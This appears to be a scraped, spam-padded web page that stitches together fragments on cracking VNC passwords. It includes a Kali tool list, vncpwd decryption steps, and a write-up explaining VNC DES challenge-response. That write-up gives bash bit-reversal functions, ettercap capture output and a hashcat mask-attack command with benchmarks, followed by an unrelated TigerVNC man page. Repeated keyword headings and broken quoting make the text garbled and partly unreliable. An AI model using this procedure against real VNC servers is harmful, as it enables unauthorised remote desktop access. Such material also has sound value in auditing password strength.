We wanted to crack a VNC challenge response using hashcat but could not find a complete guide.
A password dictionary attack tool that targets windows authentication via the SMB protocol. Pemcrack: 12.66e02b8: Cracks SSL PEM files that hold encrypted private keys. Brute forces or dictionary cracks. Pemcracker: 9.a741c93: Tool to crack encrypted PEM files. Phoss: 0.1.13: Sniffer designed to find HTTP, FTP, LDAP, Telnet, IMAP4, VNC and POP3. In this tutorial, I'm going to teach you how to crack a VNC server's password using the Hydra password cracking utility, which comes preinstalled on BackTrac. Decrypting The Encrypted VNC Password The VNC Password Decoder (vncpwd) tool by Luigi Auriemma can decrypt classic VNC DES encryption method. Simply embed the encrypted password after the command line tool and the real password will be displayed. To use vncpwd, click Start button, type cmd at search bar and press Enter. It is intentionally the case that an unconfigured VNC Server will not accept connections. The configuration scenarios in the following sections should give some guidelines as to what will work best for you. Maximum Security. For maximum security, you should configure the VNC server to use an encrypted connection. With an unencrypted password, we are able to use VNC to connect to all WYSE devices we use (3010/3010/3040). We would like to use an encrypted password. These are the instructions from the ConfGen Help screen: To use AES encryption you have to do the following steps: – Enable AdminMode with Admin Name and Password for AES encryption.
So we started looking into how the VNC challenge response authentication works and here is what we understood:- The client initiates a connection with the server.
- The server sends a unique/random 16-bytes challenge to the client.
- The client uses DES to encrypt (one round) the challenge with the input password and sends the response.
- The server receives the response and does the same encryption scheme to compare the results.
- The connection is established if it matches.
For info:
It is also known that DES encryption algorithm can only accept keys of 56 bits, since ASCII uses 7 bits long characters the key can be up to 8 characters long maximum. If it is shorter, it will be padded with zeros. This is making the assumption that the traditional VNC protocol is used with DES (some new VNC client may have modified this..).
The issue is that VNC doesn't use the password given by the user as is but performs a transformation first:
- the bits of each byte of the corresponding ascii value are reversed
Password : 12345678
Ascii values (HEX) : 31 32 33 34 35 36 37 38
Binary values: 00110001 00110010 00110011 ....
Binary reversed: 10001100 01001100 11001100 ....
Reversed (HEX): 8c 4c cc 2c ac 6c ec 1c
So the actual VNC user password used for encryption is : 8c4ccc2cac6cec1c (12345678 in ASCII)
John The Ripper has implemented this in the version 1.9.0 Jumbo-1
In order to crack VNC passwords with hashcat we implemented this transformation with a small bash script to create a modified charset of the ascii characters.
toHexVNC(){
for ((i=0;i<${#1};i++));
do
ascii2binrev=`echo '${1:$i:1}' | perl -lpe '$_=unpack'B*',$_' | rev`
binrev2hex+=`printf '%02xn' '$((2#$ascii2binrev))'`
done
echo $binrev2hex
}
We are aware that this code could be optimized by using other conversion method (c.f. C++, comparison table,..).
We can now crack it with hashcat using:
- attack 3 (mask attack)
- type 14000 (DES)
- hash format : <cipher>:<plaintext> (in VNC: <response>:<challenge> and NOT <challenge>:<response>)
--> the response and challenge needs to be truncated to 8bytes length (no need to waste resources on the whole 16 bytes and in any case hashcat accepts only 8 bytes of cipher/plaintext).
- reversed charset and option --hex-charset
Crack Or Decrypt Vnc Server Encrypted Password Download
note : it might be more interesting to generate a custom reversed charset using the function above as the full DES charset of hashcat uses more than the 95 main ascii characters. See 'VNC_allascii.charset' below.$ ettercap -Tq -r VNC.cap
ettercap 0.7.5.4 copyright 2001-2013 Ettercap Development Team
...
192.168.11.110-5901:$vnc$*a5d62a6cd58f41abe8785a4485811aac*248d3290ce533f028613f092f25834cf
...
$ cat toCrack.txt
248d3290ce533f02:a5d62a6cd58f41ab
$ cat VNC_allascii.charset (all 95 ascii characters transfomed for VNC)
8646c626a666e6169656d636b676f60e8e4ece2eae6eee1e9e5e8242c222a262e2129252d232b272f20a8a4aca2aaa6aea1a9a5a0c8c4ccc2cac6cec1c9c840224a4547ab4d4fabc7edabadebe5cdc3c7c3474fcf43a449414e46406043e
$ hashcat -a 3 -m 14000 toCrack.txt -1 VNC_allascii.charset ?1?1?1?1?1?1?1?1 --hex-charset
#Returns: 8c4ccc2cac6cec1c
The cracked password will be an HEX value and will need to be reversed again to find the password (in ASCII) with the following function:
toAscii(){
for ((i=0;i<${#1};i+=2));
do
hex2binary=`perl -e 'printf '%08bn', 0x'${1:$i:2}'' | rev`
ascii2binrev+=`echo $hex2binary | perl -lpe '$_=pack'B*',$_'`
done
echo $ascii2binrev
}
Which will give the reversed password: 12345678
Some benchmarks:
Using 2x NVIDIA Quadro P4000 8GB
Crack Or Decrypt Vnc Server Encrypted Password Windows 10
8 characters long loweralphanumspace -> max. ~2min
8 characters long mixalphanum -> max. ~2.2hours
8 characters long mixalphanumspace -> max. ~2.5hours
8 characters long allascii -> max. ~3days
Hope you'll find this interesting and useful.
Crack Or Decrypt Vnc Server Encrypted Password
Please feel free to give us feedback, thank you.
A&J
NAME
vncpasswd− change the VNC password
SYNOPSIS
vncpasswd[passwd-file]
vncpasswd −f
DESCRIPTION
vncpasswdallows you to set the password used to access VNC desktops.Its default behavior is to prompt for a VNC password andthen store an obfuscated version of this password topasswd-file (or to $HOME/.vnc/passwd if no passwordfile is specified.) The vncserver script runsvncpasswd the first time you start a VNC desktop, andit invokes Xvnc with the appropriate−rfbauth option. vncviewer can also begiven a password file to use via the −passwdoption.
The passwordmust be at least six characters long (unless the−f command-line option is used-- see below),and only the first eight characters are significant. Notethat the stored password is not encrypted securely -anyone who has access to this file can trivially find outthe plain-text password, so vncpasswd always setsappropriate permissions (read and write only by the owner.)However, when accessing a VNC desktop, a challenge-responsemechanism is used over the wire making it hard for anyone tocrack the password simply by snooping on the network.
OPTIONS
−f | Filter mode. Read a plain-textpassword from stdin and write an encrypted version tostdout. Note that in filter mode, short or even emptypasswords will be silently accepted. |
A view-onlypassword must be separated from the normal password by anewline character.
FILES
$HOME/.vnc/passwd
Crack Or Decrypt Vnc Server Encrypted Password Free
Default location of the VNCpassword file.
SEE ALSO
vncviewer(1),Xvnc(1) vncconfig(1), vncsession(8)
https://www.tigervnc.org
AUTHORS
Crack Or Decrypt Vnc Server Encrypted Password Tool
TristanRichardson, RealVNC Ltd., Antoine Martin, D. R. Commanderand others.
VNC wasoriginally developed by the RealVNC team while at OlivettiResearch Ltd / AT&T Laboratories Cambridge. TightVNCadditions were implemented by Constantin Kaplinsky. Manyother people have since participated in development, testingand support. This manual is part of the TigerVNC softwaresuite.